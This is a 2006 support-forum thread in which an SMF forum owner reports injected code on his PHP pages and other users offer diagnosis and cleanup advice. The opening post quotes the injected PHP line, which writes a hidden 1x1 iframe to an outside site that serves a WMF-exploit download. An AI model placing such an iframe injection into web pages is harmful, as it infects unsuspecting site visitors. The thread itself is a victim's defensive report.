Uutiset:

Wondering if this will always be free?  See why free is better.

Main Menu
Advertisement:

Hmm, seems to be a virus when we updated to smf rc2

Aloittaja joeshmo, tammikuu 04, 2006, 04:28:41 IP

« edellinen - seuraava »
Tulosta
Siirry alas Sivuja1
Käyttäjän toimet

joeshmo

tammikuu 04, 2006, 04:28:41 IP Viimeisin muokkaus: tammikuu 04, 2006, 06:28:51 IP käyttäjältä MikeMill
It added an extra bit of code to almost every .php page that triggers a virus download from another site. check it out here: *linksnipped*
Koodi [Valitse]
<? echo ('<html><head><title></title></head><body><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html>');?>

The link in the above sends you a virus download that looks like it came from our site. Help please! We did not have this problem in any past version of smf and it doesnt look like anything is already on the forums.

Skipdawg

#1
tammikuu 04, 2006, 06:23:17 IP
Do not click on his link if you don't have a very good and solid firewall and antivirus!

Took me about 5 minutes to clean up the mess. That board should be disabled till problem fixed!
Skipdawg's Community

Powered by SMF 1.1.3

Trekkie101

#2
tammikuu 04, 2006, 06:26:14 IP
How touching the WMF exploit.

Next windows update will fix that :)

sg3524

#3
tammikuu 04, 2006, 06:28:07 IP
This is absolutely not coming from your RC2 code.  It may exist elsewhere on your site though.

Its a popular form of attack now taking place out there.  Look for .htaccess files that have been modified, or that you did not put there.

Let me know if you find any.  I can give you some hints about how to protect yourself.

GRAM

Thantos

#4
tammikuu 04, 2006, 06:31:32 IP
Lainaus käyttäjältä: Trekkie101 - tammikuu 04, 2006, 06:26:14 IP
How touching the WMF exploit.

Next windows update will fix that :)
So 3 years? :)

I removed the link given and posted it in a moderator area.  We don't want any of our users accidentally infected.

Trekkie101

#5
tammikuu 04, 2006, 06:35:22 IP
Lainaus käyttäjältä: MikeMill - tammikuu 04, 2006, 06:31:32 IP
Lainaus käyttäjältä: Trekkie101 - tammikuu 04, 2006, 06:26:14 IP
How touching the WMF exploit.

Next windows update will fix that :)
So 3 years? :)

I removed the link given and posted it in a moderator area.  We don't want any of our users accidentally infected.

lol no, I meant the next patch, windows update.

Firefox, Opera arent affected unless you choose to save it.

Trekkie101

#6
tammikuu 04, 2006, 06:40:48 IP
Ive tracked through all the iframes, and reported the site to the webhost. www.ev1.net

Hopefully their abuse center will deal with it.

joeshmo

#7
tammikuu 04, 2006, 07:15:10 IP
Yeah, sorry bout the link. Firefox opens a zillion downloads called password.wmf . I made the area off limits to all users to prevent people from getting a virus.
Htdocs dont appear to be changed. It just says this really:

Lainaa<Files 403.shtml>
order allow,deny
allow from all
</Files>

I really dont see anything changed, though I am changing my password for safety and stuff. Should I just upload smf rc2 again?

JayBachatero

#8
tammikuu 04, 2006, 08:37:02 IP
I think you should just wait until it's cleared or it will continue to happen.

-JayBachatero
Follow me on Twitter

"HELP!!! I've fallen and I can't get up"
This moment has been brought to you by LifeAlert
Tulosta
Siirry ylös Sivuja1
Käyttäjän toimet
Advertisement: